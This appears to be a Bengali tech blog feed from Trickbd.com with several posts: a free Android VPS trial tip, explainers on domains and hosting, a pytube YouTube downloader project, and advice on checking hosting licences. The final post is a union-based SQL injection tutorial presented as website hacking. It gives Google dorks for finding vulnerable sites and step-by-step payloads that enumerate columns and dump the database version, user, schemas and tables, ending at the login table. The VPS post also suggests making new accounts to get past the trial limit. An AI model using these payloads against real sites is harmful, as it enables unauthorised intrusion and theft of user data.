Monday, March 22, 2021

Android OS এর VPS নিন সম্পুর্ন ফ্রি🏅🏅

Android OS এর VPS নিন সম্পুর্ন ফ্রি🏅🏅

অন্যদের মত ভাই আমি মজা করে লিখতে পারি না তাই
সরাসরি পোষ্ট এ আসি।
-যা যা লাগবে
#১৷ emailondeck (for unlimited mail)
#২৷ VPS Site (free vps website)
-ধাপ
#১৷ প্রথমেই Emailondeck থেকে একটা মেইল নিন।
#২৷ পরে এই সাইটে যান।
রেজিষ্ট্রেশন এর সকল বক্স যথাযথভাবে পুরন করুন।
বা স্ক্রিনশটগুলা ফলো করুন।
Ss-1 ফর্মটা ভালোভাবে পূরণ করুন।
region যেকোন একটা দিলেই হবে।
#no vpn needed

Submit করার পর ইমেইল এ যান গিয়ে ভেরিফাই করে লগিন করুন। পরে নিচের মত ইন্টারফেস পাবেন

VPS এ যে মডেল এ ফোন নিতে চান থ্রি ডট এ ক্লিক করে start করে দিন।
ব্যস আপনার এন্ড্রয়েড ভিপিএস নিচের মত চালু

N:B এটা ৩০ মিনিটের ট্রায়াল ট্রায়াল শেষে নতুন একাউন্ট করে ইচ্ছামত চালাতে পারবেন।
আজকের মত এখানেই বিদায়।
কোন সমস্যা হলে কমেন্ট বক্স তো আছেই।
আর খারাপ লাগলে রিপোর্ট ও আছে।
ফেসবুকে আমি
টেলিগ্রামে আমি

The post Android OS এর VPS নিন সম্পুর্ন ফ্রি🏅🏅 appeared first on Trickbd.com.


ডোমেইন এবং হোষ্টিং কি ?কেন, কিভাবে পরিচালিত হয় ?বিস্তারিত (সম্পূর্ণ বাংলায়)

ডোমেইন এবং হোষ্টিং কি ?কেন, কিভাবে পরিচালিত হয় ?বিস্তারিত (সম্পূর্ণ বাংলায়)

আসসালামু আলাইকুম প্রিয় ট্রিববিডিবাসী আশা করি সকলে ভালো আছেন ।

আজকে আপনাদের সাথে যে বিষয়টা শেয়ার করতে যাচ্ছি তা হলো ডোমেইন এবং হোষ্টিং কি এবং তা কিভাবে এবং কোথা থেকে পরিচালিত হয় তার সম্পূর্ণ বিস্তারিত এবং খুঁটিনাটি ।

[বি:দ্র: যারা জানেনা পোষ্টটি তাদের জন্য । অনেকেই এ বিষয়ে কিছু জানেনই না । মূলত পোষ্টটি নতুনদের জন্য , এবং এ বিষয়ে শিক্ষা লাভের জন্য]

 

প্রথমত :

ডোমেইন কি? কেন? কিভাবে ?

ডোমেইন হচ্ছে মুলত একটি নির্দিষ্ট নাম, উপাধি অথবা নির্দিষ্ট একটি কমান্ড । যা নির্দিষ্ট কোন ওয়েবসাইটের জন্য ব্যবহৃত হয় । আমরা মুলত যে ওয়েবসাইট গুলো ব্যবহার করি বা তৈরি করি তার একটি নির্দিষ্ট নাম আছে যা শুধুমাত্র একটি নাম একটি ওয়েবসাইটের জন্যই প্রযোজ্য । যেমন: facebook.com, youtube.com, google.com, gmail.com, trickbd.com । মুলত ডোমেইন নির্দিষ্ট একটি কমান্ড মাত্র । যাকে কমান্ড করে বলা হয় যে তুমি অমক যায়গার সাথে কানেক্ট হও । যখন আমরা আমাদের ব্রাউজারে কোন ডোমেইন নেম লিখে ইন্টার করি তখন মুলত ওই ডোমেইন কমান্ড এর মাধ্যমে ওই ডোমেইন এর সাথে কানেক্ট থাকা সার্ভারটি আমাদের সামনে হাজির হয় । অর্থাৎ ওয়েবপেজটি ভিউ হয় । যেমন ধরুন, আপনার ব্রাউজারে টাইপ করলেন trickbd.com অতপর যে ওয়েবপেজটি ভিউ হচ্ছে সেই ওয়েবপেজ এর সার্ভারটি মুলত ডোমেইন  এর সাথে কানেক্ট করা, আর trickbd.com টি মুলত ওই সার্ভার পেজটাকে কমান্ড করে ভিউ হবার জন্য । একটি ডোমেইন মুলত একটিমাত্র সার্ভারপেজকেই/ওয়েবসাইটকেই কমান্ড করতে পারে । তবে একটা ডোমেইন একটামাত্র ওয়েবসাইটকে কমান্ড করতে পারলেও,  একটি ওয়েবসাইটে একাধিক ডোমেইন নেম ব্যবহার করা যেতে পারে ।  যেমন trickbd.com এই ওয়েবসাইটের অনেকগুলো নাম/ডোমেইন থাকতে পারে । যাহা trickbd.com ওয়েবপেজটিই ভিউ করে দেখাবে । কিন্তু ডোমেইন কেবল একটিমাত্র ওয়েবপেজই ভিউ করে দেখাতে পারে ।

 

হোষ্টিং কি? কেন? কিভাবে ?

হোষ্টিং টা হচ্ছে মুলত অনলাইন ষ্টোরেজ । এটি আপনার ওয়েবসাইটকে অনলাইনে লাইভ করার জন্য ব্যবহৃত হয় । সহজ কথায় বুঝাতে গেলে, মেমোরি কার্ড তো আমরা সকলেই চিনি । এটি মুলত একটি মেমোরি কার্ডের মতোই । আপনার মেমোরি কার্ড যেমন 1জিবি, 2জিবি, 3জিবি বা বিভিন্ন রকমের হতে পারে । হোষ্টিং ও ঠিক তেমনি 1জিবি, 2জিবি বা 5জিবি বা আনলিমিটেড পর্যন্ত থাকে । আমরা আমাদের মেমোরী কার্ডে যেমন গান, ভিডিও, ছবি, ডকুমেন্ট বা বিভিন্ন ফাইল রাখি । হোষ্টিং ও ঠিক তেমন । আমাদের প্রয়োজনীয় ফাইল, তথ্য, ছবি বা বিভিন্ন ফাইল রাখার অনলাইন প্লেস । যা মেমোরী কার্ডের মতো দেখা যায় না । হোষ্টিং কে মুলত একটি লাইভ সার্ভার বলা যায় । যেখানে আপনার ওয়েবসাইটের ডিজাইন ফাইল বা বিভিন্ন কিছু হোষ্ট করা থাকে । এবং তা অনলাইনে দেখতে পান ।
মনে করুন, youtube.com একটি ওয়েবসাইট । এখানে আপনি যে ভিডিওগুলো দেখছেন তা অবশ্যই ইউটিউবের হোষ্টিং রাখা আছে । আবার ইউটিউব ওয়েবসাইটের যে ডিজাইন সেটাও ওই হোষ্টিং আপলোড করা আছে । মুলত ইউটিউব এ যা যা দেখছেন তা সবকিছুই ইউটিউব এর হোষ্টিং এ আপলোড করা আছে । এখানে মজার বিষয়টা হচ্ছে ইউটিউব বলেন বা যে ওয়েবসাইট ই বলেন তার সবকিছুই কোন না কোন কম্পিউটার এ রাখা আছে । কোন না কোন কম্পিউটারের হার্ডডিস্ক বা এসএসডি ডিস্ক থেকে আপনাকে 1জিবি বা 5জিবি আপনার চাহিদামত স্টোরেজ আলাদাভাবে আপনার ডোমেইন এর আন্ডারে আলাদে করে দেওয়া হয় । যেন আপনার ডোমেইন এ ক্লিক করলে ওই ডোমেইন এর আন্ডারে থাকা কন্টেটগুলো দেখায় ।

আর হোষ্টিং এর সাথে আপনার যেকোন ডোমেইন কানেক্ট করতে মুলত কিছু মেথড ব্যবহার করা হয় । মেথড গুলোর মধ্যে কয়েকটি হলো: Nameserver, A record, Cname record, Glue record, dns ইত্যাদি । মেথডগুলি মুলত ডোমেইন এ সেটাপ করা হয় । প্রত্যেকটি হোষ্টিংএরই মুলত আলাদা আলাদা নেমসার্ভার থাকে যা ডোমেইন এ সেটাপ করতে হয় । সহজ কথায়, ডোমেইনকে নির্দেষ দিয়ে বলে দিয়ে দিতে হয় তুমি অমক সার্ভার/হোষিটং এর সাথে কানেক্ট হও । এবং সেই হোষিটং এর নেমসার্ভার বা এ রেকর্ড বসিয়ে দিতে হয় । তবেই নির্দিষ্ট ডোমেইন টি নির্দিষ্ট হোষ্টিং এ কানেক্ট হয় । এবং আপনার কাঙ্খিত ডোমেইনটি লাইভ হয় ।

[মনে রাখবেন যে, একটি ওয়েবসাইটের জন্য ডোমেইন হোষ্টিং ২টাই লাগবে]

এখানে ডোমেইন টা হচ্ছে আপনার ওয়েবসাইট এর নাম এবং হোষ্টিং টা হচ্ছে আপনার ওয়েবসাইট এর প্রাণ ।

 

সহজভাবে সবাইকে বুঝানোর চেষ্টা করলাম । কোন ভুল হলে ক্ষমা করবেন ।

ধন্যবাদ সবাইকে ।

 

 

 

The post ডোমেইন এবং হোষ্টিং কি ?কেন, কিভাবে পরিচালিত হয় ?বিস্তারিত (সম্পূর্ণ বাংলায়) appeared first on Trickbd.com.


Friday, March 19, 2021

Python project: নিজেই নিজের Youtube Downloader বানিয়ে নিন..[Feel like a Developer]

Python project: নিজেই নিজের Youtube Downloader বানিয়ে নিন..[Feel like a Developer]

আসসালামু আলাইকুম

ইউটিউব ডানলোডার একটি পাইথন প্রজেক্ট। এই প্রজেক্টের উদ্দেশ্যটি হ’ল আপনার ডিভাইসে ইউটিউব থেকে দ্রুত এবং সহজ উপায়ে যে কোনও ধরণের ভিডিও ডাউনলোড করা।

এই পাইথন প্রজেক্টে , যে ইউটিউব ভিডিও ইউআরএলটি ডাউনলোড করতে চান তা কপি করতে হবে এবং সেই URL টি পেস্ট করতে হবে এবং ডাউনলোড বাটনে ক্লিক করতে হবে, এটি ভিডিওটি ব্যাকগ্রাউন্ডে ডাউনলোড শুরু করবে। ভিডিও ডাউনলোড শেষ হয়ে গেলে, এটি ডাউনলোড বাটনের নীচে উইন্ডোতে একটিমেসেজ ‘ডাউনলোড’ পপআপ দেখাবে.

Project prerequisite

Downloader তৈরির জন্য আমরা Python, Tkinter, pytube লাইব্রেরি ব্যবহার করব।

Tkinterএকটি স্ট্যান্ডার্ড GUI লাইব্রেরি এবং এটি ইউটিউব থেকে ভিডিও ডাউনলোড করার জন্য ব্যবহৃত একটি GUI অ্যাপ্লিকেশন.
পাইথনে ইউটিউব ভিডিও ডাউনলোডার তৈরি করার জন্য নিম্নলিখিত পদক্ষেপগুলি:

Import libraries
Create display window
Create field to enter link
Create function for storage
Create function to start downloading
আমি pydroid3 ব্যাবহার করতেছি। আপনি আপনার ইচ্ছামত কোড এডিটর ব্যবহার করতে পারেন।

প্রয়োজনীয় মডিউলগুলি ইনস্টল করতে কমান্ড লাইনে পিপ ইনস্টলার কমান্ডটি লিখুন:

 pip install pytube 

code:Click here স্ক্রিনশট with proof





url কপি আর পেস্ট করতে hacker’s keyboard use করতে পারেন

The post Python project: নিজেই নিজের Youtube Downloader বানিয়ে নিন..[Feel like a Developer] appeared first on Trickbd.com.


কম দামে ডোমেইন হোষ্টিং কিনে প্রতারিত হচ্ছেন না তো ? জেনে নিন ডোমেইন হোষ্টিং কেনার আগে করণীয়

কম দামে ডোমেইন হোষ্টিং কিনে প্রতারিত হচ্ছেন না তো ? জেনে নিন ডোমেইন হোষ্টিং কেনার আগে করণীয়

আসসালামু আলাইকুম,

প্রিয় ট্রিকবিডিবাসী…
আশা করি সকলে ভালো আছেন ।

বর্তমানে ডোমেইন এবং হোষ্টিং একটি জনপ্রিয় বিষয় । ডোমেইন হোষ্টিং ছাড়া ওয়েবসাইট অকল্পনীয় । এটাই মূলত কেন্দ্র করে অনেকেই নামী-বেনামী অনেক কোম্পানী খুলে বসেছেন আবার অনেকেই লোভনীয় অফার ছড়িয়ে কাষ্টমারের হাজার হাজার টাকা হাতিয়ে নিচ্ছেন, যা খুবই দন্ডনীয় একটি অপরাধের মধ্যে পড়ে । কিন্তু তারা সম্পূর্ণই ধরাছোয়ার বাহিরে থাকে ।

বিশেষ করে আমাদের বাংলাদেশে থেকে অনেকেরেই মাষ্টারকার্ড বা পেপাল না থাকায় ডোমেইন হোষ্টিং কেনার জন্য অন্যকারও শরনাপন্ন হতে হয় । তারা বাংলাদেশি বা বিদেশী কিছু কোম্পানীর লোভনীয় কিছু অফার দেখে কোন কিছু না বুঝেই বিকাশ বা রকেট বা বাংলাদেশী লোকাল পেমেন্ট করে দিয়ে থাকে । এবং বেশিরভাগই প্রতারণার স্বীকার হয়।

ইদানিং অনেক ছোটবড় কিছু বেনামী কোম্পানী যারা মাথাচাড়া দিয়ে উঠে স্বলদামী লোভনীয় বিঙ্গাপন ছড়িয়ে কাষ্টমারকে বিরাট বিভ্রান্তিতে ফেলে তাদের আকৃষ্ট করছে তাদের থেকে ডোমেইন হোষ্টিং সার্ভিস নেওয়ার । আমরাও  তাদের লোভনীয়  অফারে পা বাড়িয়ে দিই । এবং প্রতারণার স্বীকার হই ।

মূলত তারা এটাই করে যে,

হোষ্টিং এর ক্ষেত্রে কোন রকমের লাইসেন্স ছাড়াই, সিপ্যানেল রিলেটেড সিষ্টেমের ক্রাক ভার্সন ব্যবহার করে থাকে তাই তাদের অতিরিক্ত কোন খরচ হয় না তখন অনেক কম দামে তারা হোষ্টিং সেল করতে পারে । তখন কোন গ্রাহক তাদের সার্ভিস নিলেও সেই সার্ভিসের কোন গ্যারান্টি থাকে না । যে কোন সময় সেই গ্রাহকের ডাটা হ্যাক হয়ে যেতে পারে । কেননা তার সিষ্টেমটি সম্পূর্ণই বেআইনি বা ক্রাক ভার্সন । আবার অনেকেই WHMCS রিলেটেড সিষ্টেমেরও ক্রাক ভার্সন ব্যবহার করে থাকে সেক্ষেত্রেও তাদের গ্রাহকদের ডাটা হ্যাক হবার সম্ভাবনা থাকে । অনেকেই দেখেছি বিভিন্ন ফেসবুক গ্রুপ বা বিভিন্ন সোস্যল মিডিয়ায় জানিয়েছেন যে তাদের ওয়েবসাইট চলছে না বা তাদের ওয়েবসাইট ডাউন দেখাচ্ছে বা তারা যেখান থেকে হোষ্টিং সার্ভিস নিয়েছেন সেই কোম্পানীই উধাও । তারা মূলত এমনই প্রতারণার স্বীকার ।

তবে বাংলাদেশেও কয়েকটি ভালো ভালো ডোমেইন হোষ্টিং কোম্পানী আছে, তবে তাদের কোন লোভনীয় অফার নেই । থাকলেও অনেক কম বা মাঝেমাঝে দেয় ।

আসুন জেনে নেই এ ধরনের প্রতারণা থেকে বাচতে কি কি করণীয়:

  • প্রভাইডারের সিপ্যানেল বা সিপ্যানেল রিলেটেড সিষ্টেম এর লাইসেন্স আছে কিনা চেক করে দেখুন । এক্ষেত্রে যদি তাদের সিষ্টেম টা cPanel হয়ে থাকে (বাংলাদেশের 99%প্রভাইডার cPanel ব্যবহার করে ) তাহলে তাদের লাইসেন্স চেক করুন । সিপ্যানেল লাইসেন্স চেক করার ইউআরএলটি হলো: https://verify.cpanel.net/app/verify । এখানে গিয়ে আপনার কাংখিত প্রভাইডারের ইউআরএল অথবা তাদের আইপি এড্রেসটি দিন (আইপি এড্রেস যদি না জানেন তবে আপনার প্রভাইডার থেকে আইপি এড্রেসটি জেনে নিন) । যদি তাদের লাইসেন্স করা থাকে তবে এখানে উক্ত সার্চ করার পরে আপনি তাদের লাইসেন্স সম্পর্কিত তথ্য পেয়ে যাবেন । আর যদি লাইসেন্স না থাকে, যদি সিষ্টেমটি দেখাবে “Not Licensed”
  • প্রভাইডারের বিলিং সিষ্টেমের লাইসেন্স আছে কিনা চেক করে দেখুন, বাংলাদেশীরা সকলেই বেশিরভাগ বিলিং সিষ্টেমের জন্য WHMCS ব্যবহার করে থাকে  । সেক্ষেত্রে WHMCS লাইসেন্স চেক করার জন্য অফিশিয়াল লাইসেন্স চেক ইউআরএল https://www.whmcs.com/members/verifydomain.php এ গিয়ে আপনার কাংখিত প্রভাইডারের ইউআরএলটি বসিয়ে দিন । যদি লাইসেন্স থেকে থাকে তবে লাইসেন্স অথরাইজড দেখাবে আর যদি লাইসেন্স না থাকে তবে লাইসেন্স আনঅথরাইজড দেখাবে । ।
  • তাদের সম্পর্কে গুগল রিভিউ । একটা কোম্পানী সম্পর্কে সবথেকে ভালো ধারণা পাবেন আপনি গুগল রিভিউ থেকে । কেননা কাষ্টমার সেই কোম্পানী থেকে কেমন সার্ভিস পেয়েছে তা বেশিরভাগ কাষ্টমারই গুগলে রিভিউ করে দেয় । অর্থাৎ আপনার কাংখিত প্রভাইডরের গুগল রিভিউ টা ভালো করে দেখুন যে তারা কেমন সার্ভিস প্রভাইড করছে । এখানে কাষ্টমার ভালোমন্দ সব ধরনের রিভিউ ই দিতে পারে । এখানে যাচাই করে দেখুন যে কোন ধরনের রিভিউগুলো সবথেকে ভালো যদি ভালো রিভিউ বেশি থেকে থাকে তবে অনায়াসে এই কোম্পানী থেকে ডোমেইন হোষ্টিং নিতে পারবেন ।
  • আপনি যে ডোমেইন হোষ্টিং কিনছেন তার ফুল কন্ট্রোল প্যানেল আপনি পাচ্ছেন কিনা যাচাই করে নিন । কেননা অনেক কোম্পানী আছে যারা আপনাকে ডোমেইন কন্ট্রোল প্যানেল, বা হোষ্টিং কন্ট্রোল প্যানেল দিবে না । সেক্ষেত্রে যেকোন সময় যদি কোনভাবে কোম্পনী টি গায়েব হয়ে যায় তখন আপনার ডোমেইন এবং হোষ্টিং এর ফুল কন্ট্রোল আপনার কাছে থাকায় আপনার সার্ভিসের সম্পূর্ণ নিরাপত্তা বজায় থাকলো। চাইলে তখন আপনি নিজেই রিনিউ করতে পারবেন বা চাইলেই যেকোন কোম্পানীতে আপনার সার্ভিসটি ট্রানস্ফার করতে পারবেন ।

তো বন্ধুরা এই অপশনগুলোই রইলো আপনাদের জন্য । এগুলো যাচাই সাপেক্ষে যদি সবকিছু ঠিকঠাক থাকে তবে অবশ্যই সেই কোম্পাণীগুলো থেকে অনায়াসে ডোমেইন হোষ্টিং কিনতে পারেন । কেননা এই লাইসেন্সগুলো তারাই ইস্যু করে থাকবে যারা পার্মানেন্ট ভালো সার্ভিস দিতে বিজনেস করতে এসেছে । আর যাদের নেই তাদের মনে করবেন মুখে মিষ্টি কথা বললেও মুলত তাদের বিজনেস করতে হয় গ্রাহক প্রতারণা করতে এসেছে ।

তো আজ এ পর্যন্তই ।
ভালো থাকুন সবাই

The post কম দামে ডোমেইন হোষ্টিং কিনে প্রতারিত হচ্ছেন না তো ? জেনে নিন ডোমেইন হোষ্টিং কেনার আগে করণীয় appeared first on Trickbd.com.


Sql injection Bangla part 1

Sql injection Bangla part 1

সবাই আশা করি ভালো আছেন।

(বিশেষ দ্রষ্টব্যঃটিউটোরিয়ালে আমি একটি কাল্পনিক (যে সাইটের কোনো অস্তিত্ব নেই) সাইট কে উদাহারণ হিসাবে ধরে নিয়ে আপনাদের দেখানোর চেষ্টা করেছি।)
আপনি যদি কোনো সাইট Sql injection করতে যান তবে এই টিউটোরিয়ালের সাথে অনেক অমিল থাকতে পারে,তবে
কমান্ড গুলো সব একই হবে।)
এখন থেকে আমি SQL INJECTION নিয়ে নিয়মিত পোস্ট লেখার চেষ্টা করবো।
আজকে আমি আপনাদের সাথে বেসিক ইউনিয়ন বেজড SQL INJECTION
কিভাবে করা হয় সেটা দেখাবো।
এবং বিস্তারিত আলোচনা করার চেষ্টা করবো আশা করি ধৈর্য সহকারে পড়বেন।

  • SQL INJECTION কি?

SQL INJECTION  হচ্ছে বর্তমান সময়ের ওয়েবসাইট হ্যাকিং সবচেয়ে জনপ্রিয় এবং
কমন মেথড/পদ্ধতি।
আসলে SQL INJECTION হচ্ছে তেমন কঠিন জিনিস না তবে
এটা ভালোভাবে শিখতে হলে,
এটার পিছনে আপনার অনেক সময় দেওয়া লাগবে।
কিন্তু হ্যাকিং এ নতুন এমন  অনেক Newbiee হ্যাকার মনে করে যে SQL INJECTION কোনো বড ব্যাপার নাহ
কারণ তারা খুব সহজেই বিভিন্ন টুলস(Havij,Sqlmap,Sqlninja) ইত্যাদি ব্যাবহার করে SQL INJECTION  করতে পারে।
কিন্তু SQL INJECTION  এমন একটা জিনিস যেটা সম্পর্কে আপনার সম্পূর্ণ শিখতে হলে অনেক বই শেষ করা লাগবে 🙂
এর মানে বোঝা গেলো যে শুধুমাত্র টুলস ব্যাবহার করে আপনি অনেক সাইট কিন্তু SQL INJECTION করতে পারবেন।
কিন্তু তার দ্বারা আসলেই কোনো লাভ হবে না।
কারণ আপনি কিছুই শিখতে পারবেন না।
এবং অনেক সময় টুলস দিয়েও SQL INJECTION এর জন্যে দুর্বল/ভুলনারেবল সাইট হ্যাক করতে পারবেন না।
যায় হোক।

  • SQL INJECTION দ্বারা কি কি করতে পারবেন আপনি?
  1. আপনি ডাটাবেসে তথ্য তে এক্সেস নিতে পারবেন।
  2. আপনি ডাটাবেসের তথ্য মোডিফাই করতে পারবেন।
  3. আপনি সাইটের লগইন এরিয়া বাইপাস করতে পারবেন।
  4. আপনি SQL Server হ্যাক করতে পারবেন।

তাহলে শুরু করা যাক।
প্রথমত আমাদের SQL INJECTION এর জন্যে ভুলনারবল সাইট বের করতে হবে।
যদি আপনি হ্যাকার হন,তাহলে আপনি ভালো করেই জানবেন যে সার্চ ইঞ্জিন হলো হ্যাকারদের
সবচেয়ে বেস্ট ফ্রেন্ড।আমরা SQL INJECTION ভুলনারবল সাইট GOOGLE Dork
ব্যাবহার করে বের করতে পারবো।
নিচে আমি কিছু কমন SQL INJECTION Dork দিচ্ছিঃ

inurl:/index.php?id=
inurl:/home.php?id=
inurl:/article.php?id=
inurl:/news.php?id=

Dork আরো অনেক বড বিশাল লিস্ট আছে। পরে কোনো এক সময় শেয়ার করবো।
অথবা আপনি গুগল থেকে সার্চ করে বের করে নিতে পারেন।
এখন আপনি এখান থেকে যেকোনো একটি Dork নিয়ে গুগলে সার্চ দিলে
রেসাল্টে অনেক সাইট দেখতে পাবেন।
সেখান থেকে যেকোনো একটি সাইটে প্রবেশ করুন।
মনে করুন এরকম একটি সাইট পেলেন আপনি (উদাহারণ)

website.com/index.php?id=1

এই ইউআরএল টি অনেক রকমের হতে পারে। তবে আমি উদাহারণের জন্যে এটি দেখালাম।
এখন আমরা টেস্ট করবো সাইটটি SQL INJECTION ভুলনরাবল কিনা।
তার জন্যে আমি সাইটের শেষে এই (‘) চিহ্নটি দিবো (ব্রাকেটের মাঝখানের চিহ্নটি)
উদাহারণঃ

website.com/index.php?id=1

এখন যদি সাইটি SQL INJECTION এর জন্যে ভুলনারবল হয় তাহলে
আপনি এরকম কিছু এরর দেখতে পাবেন।

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server
version for the right syntax to use near ‘\” at line 1
অথবা,
Warning: mysql_fetch_array()

অথবা আপনি যদি কোনো রকমের mysql এরর দেখতে পান।
অথবা যদি সেই ওয়েব পেইজ থেকে কোনো ডাটা মিস করে তাহলে বুঝতে হবে
সাইটটি SQL INJECTION ভুলনরাবল।
যদি এসবের কিছু না হয় তাহলে সাইটটি ভুলনারবল নাহ!
অন্য আরেকটি সাইট খুজুন।
এরর পাওয়ার পরে এখন আমাদের কাজ হবে সাইটটি কি এক্সপ্লইটিং করার ।
মানে SQL INJECTION করতে হবে।
আমরা এতক্ষন ভুলনারবল সাইট বের করলাম,এখন আমাদের কাজ হবে সাইটটি থেকে ডাটা
ডাম্প করা বা হ্যাক করা।
এখন আমাদের পরবর্তী পদক্ষেপ হবে এই ডাটাবেসের টেবিলে কলামের সংখ্যা কতো সেটা বের করা।
সেজন্যে আমরা ‘ চিহ্ন টি order by statement এ পরিবর্তন করবো।
উদাহারণঃ

website.com/index.php?id=1order by 1–
website.com/index.php?id=1order by 2–
website.com/index.php?id=1order by 3–
website.com/index.php?id=1order by 4–

আমাদের order by এর নাম্বার টি বাডিয়ে যেতে হবে যতক্ষন না আমরা
সাইটটি তে কোনো এরর দেখতে না পায়।
এরর অনেকটা এরকম হতে পারে,
unknown column numbers
অথবা
সাইটের কিছু ডাটা মিস হতে পারে।
উদাহারণঃ

http://www.exaplme.sqlsite.com/page.php?id=20 order by 1– NO ERROR
http://www.exaplme.sqlsite.com/page.php?id=20 order by 2– NO ERROR
http://www.exaplme.sqlsite.com/page.php?id=20 order by 3– NO ERROR
http://www.exaplme.sqlsite.com/page.php?id=20 order by 10– NO ERROR
http://www.exaplme.sqlsite.com/page.php?id=20 order by 20– NO ERROR
http://www.exaplme.sqlsite.com/page.php?id=20 order by 21– ERROR সাইটের কনটেন্ট মিস হচ্ছে।

এখন আমারা order by 21 পর্যন্ত আসার পর error দেখতে পেলাম।
কিন্তু order by 20 দিলে কোনো এরর নেই।
তার মানে ডাটাবেসে ২০ টি কলাম আছে।
অনেক সময় order by 1000 দিলেও এরর আসে নাহ।
সে ক্ষেত্রে id / parameter এর শেষে ‘ চিহ্ন টি দিতে হয়
এবং শেষে একটি + যোগ করতে হয়।
উদাহারণঃ

http://www.exaplme.sqlsite.com/page.php?id=20‘ order by 21–+

এখন আমাদের জানা আছে যে এই ডাটাবেসে ২০টি কলাম আছে।
এখন আমাদের কাজ হবে সব কলাম সিলেক্ট করা union select statement ব্যাবহার করে।
select statement টি Data দেখার জন্যে ব্যাবহার করা হয়।
যায় হোক এর পর্যায়ে আমরা এই কোডটি ব্যাবহার করবো।

http://www.exaplme.sqlsite.com/page.php?id=20 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20–

এখন আমরা ওয়েব পেইজে কিছু নাম্বার দেখতে পাবো।
নম্বর গুলো ১-২০ এর মধ্যে হবে কারণ আমরা জানি এই সাইটের কলাম ২০ টি।
আর আমরা যে কমান্ডটি ব্যাবহার করেছি সেটা দিয়ে ২০টি কলামের মধ্যে কোনটি
String কলাম সেটা বের করার জন্যে এই কমান্ড টি ব্যাবহার করেছি।
যদি আপনি কোনো নাম্বার দেখতে না পান তাহলে
parameter value এর আগে একটি – চিহ্ন দেন।
উদাহারণঃ

http://www.exaplme.sqlsite.com/page.php?id=-20 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20–

আপনি ওয়েবপেইজে কিছু নাম্বার দেখতে পাবেন।
আমি ৩,৪ দেখতে পেলাম।
এই দুইটা হলো String Column আমরা ডাটাবেস থেকে তথ্য হ্যাক করতে পারবো
এই দুইটি কলাম ব্যাবহার করে।
অনেক সময় উপরে যে কমান্ডটি নিয়ে লেখেছি সেটা কাজ করে নাহ 🙁
সে ক্ষেত্রে আমরা এরর দেখতে পাবো।
এই ক্ষেত্রে waf bypass করতে হবে।
সেটা সম্পর্কে সামনের টিউটোরিয়াল গুলোতে আলোচনা করবো।
এখন আমাদের কাজ ডাটাবেস থেকে ডাটা হ্যাক করা।
আমরা এখন ডাটাবেসের সংরক্ষিত গোপন ডাটা গুলো হ্যাক করতে পারবো।
এছাডাও আমরা ডাটাবেসের নাম database() এই কমান্ড টি ব্যাবহার করে,
ডাটাবেস ভার্সন জানতে  version() এই কমান্ডটি ব্যাবহার করে বের করতে পারবো।
এছাডাও আমরা SQL INJECTION এর মাধ্যমে লোড ফাইল মেথড ব্যাবহার করে
ভুলনরাবল সাইটে শেল আপলোড দিতে পারবো (এই বিষয়ে পরে টিউটোরিয়াল লেখা হবে)
এই টিউটোরিয়াল টি তে আমরা ডাটাবেস ইউজার নেম এবং ডাটাবেস ভার্সন বের করবো,
৩ এবং ৪ নম্বর String কলাম ব্যাবহার করে।
উদাহারণঃ

http://www.exaplme.sqlsite.com/page.php?id=-20 union select 1,2,version(),group_concat(database(),0x3a,user()),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20–

আমি এখানে 0x3a ব্যাবহার করেছি এটা হলো সেমিকোলন (;) এর হেক্স ভ্যালু
এটা দুইটা ডিফারেন্ট ভ্যালু কে ডিফারেন্ট প্যারামিটার এ সেপারেট করে দেখাবে।
এখন দেখা যাবে যে ৩ এর ৪ নম্বর ভুলনারবল সাইটের জায়গায় ডাটাবেস ভার্সন এবং
ডাটাবেসের ইউজারের নাম দেখাবে।
এখন আমরা ভুলনারবল সাইটের যে যে ডাটাবেস সেটা বের করবো।
তার জন্যে আমাদের কলাম নেমের জায়গায় SQL QUERY দিয়ে রিপ্লেস করতে হবে।
উদাহারণঃ

http://www.exaplme.sqlsite.com/page.php?id=-20 union select 1,2,3,group_concat(schema_name),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 from information_schema.schemata–

এখন আমরা দুইটা ডাটাবেস দেখতে পাবো
একটি information_schema আরেকটি site_database এটা সাইট এডমিন যে নামে দিয়েছে সে নামে হবে
এখন information_schema নিয়ে আমাদের কোনো কাজ নেই কারণ
কারণ information_schema তে সিস্টেম টেবিল থাকে যা ডাটাবেস কে ডিফাইন করে।
আমরা এই টেবিল গুলো ব্যাবহার করে ডাটাবেসের লে-আউট স্টাইল চেক করতে পারবো।
যায় হোক এইগুলা অনেক এডভান্স লেভেলের কথা বার্তা লোল :p
যা এখন আপনারা বুঝতে পারবেন না।
এখন আমাদের কাছে ডাটাবেস আছে (আসলে আমাদের ডাটাবেসের নাম চেক করার দরকার ছিলো না
আমি শুধু শেখার উদ্দেশ্যে সেই বিষয়ে বললাম।আমরা যদি সাইটের ডাটাবেস থেকে ডাটা হ্যাক করতে চায়
তাহলে আমরা ডাটাবেস ফাংশন ব্যাবহার করেই ডাটা ডাম্প করতে পারি।
সে ক্ষেত্রে site_database এর নাম জানার আর দরকার হবে না।
আমরা এই টিউটোরিয়ালে database() এই ফাংশন টি ব্যাবহার করে ডাটা হ্যাক করবো।)
এখন আমরা ডাটাবেস থেকে টেবিলস বের করবো।
এখন আমরা where কন্ডিশন টি ব্যাবহার করবো এই query তে।
আমরা টেবিলস নেম বের করবো select statement ব্যাবহার করে
এবং where কন্ডিশনটি ব্যাবহার করবো এটা দেখানোর জন্যে কোন ডাটাবেস থেকে আমরা টেবিলস
বের করতে চাচ্ছি।
উদাহারণঃ

http://www.exaplme.sqlsite.com/page.php?id=-20 union select 1,2,3,group_concat(table_name),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 from information_schema.tables where table_schema=database()–

এখন আপনি টেবিলস দেখতে পাবেন।
মনে করেন এই টেবিলস গুলা আমরা পেলাম।

archive,corrigendum,eselling,login,login_hindi,login_private,news,tbl_complaint,tbl_email_sender,tbl_email_sender_hindi,tbl_email_sender_private,tbl_home_animation,tbl_home_private,tbl_pages,tbl_pages_hindi,tbl_pages_private,tbl_sub_pages,tbl_tnc,tender,tender2,tender3,tender_drawing,unit

এখন আমাদের দেখতে হবে এই গুলোর মধ্যে সেনসেটিভ টেবিল কোনটা যেখানে গুরুত্বপূর্ণ ডাটা থাকবে ?
সেটা হচ্ছে login টেবিল।
